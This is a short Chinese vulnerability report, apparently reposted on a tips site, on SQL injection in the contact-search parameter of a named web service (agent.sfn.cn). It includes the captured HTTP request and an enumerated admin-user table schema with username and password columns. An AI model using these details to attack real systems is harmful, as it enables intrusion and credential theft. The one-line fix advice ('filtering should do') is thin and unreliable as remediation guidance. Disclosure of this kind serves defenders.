中科三方分站某处SQL注入漏洞 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    要断网了……没有深入,修一修就好~

详细说明:

    注册了用户后,可以添加联系人,然后再搜索就会有注入,抓包如下:

    GET /contact/list?searchCondition=1 HTTP/1.1

    Host: agent.sfn.cn

    Proxy-Connection: keep-alive

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

    Upgrade-Insecure-Requests: 1

    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36

    Referer: http://agent.sfn.cn/contact/list?searchCondition=1

    Accept-Encoding: gzip, deflate, sdch

    Accept-Language: zh-CN,zh;q=0.8

    Cookie: COOKIE略去

    然后就可以注入了:

   

   

漏洞证明

    Database: sanfront

    Table: adminUser

    [11 columns]

    +------------+--------------+

    | Column | Type |

    +------------+--------------+

    | company | varchar(100) |

    | department | int(11) |

    | email | varchar(40) |

    | entryDate | datetime |

    | id | int(10) |

    | isAudit | int(1) |

    | password | varchar(35) |

    | phone | varchar(20) |

    | realName | varchar(6) |

    | username | varchar(100) |

    | workPhone | varchar(20) |

    +------------+--------------+

    随便注一条示意下:

   

    我猜密码是Base64加密了的md5 bytes…… = =

修复方案:

    过滤下应该就好!

最新文章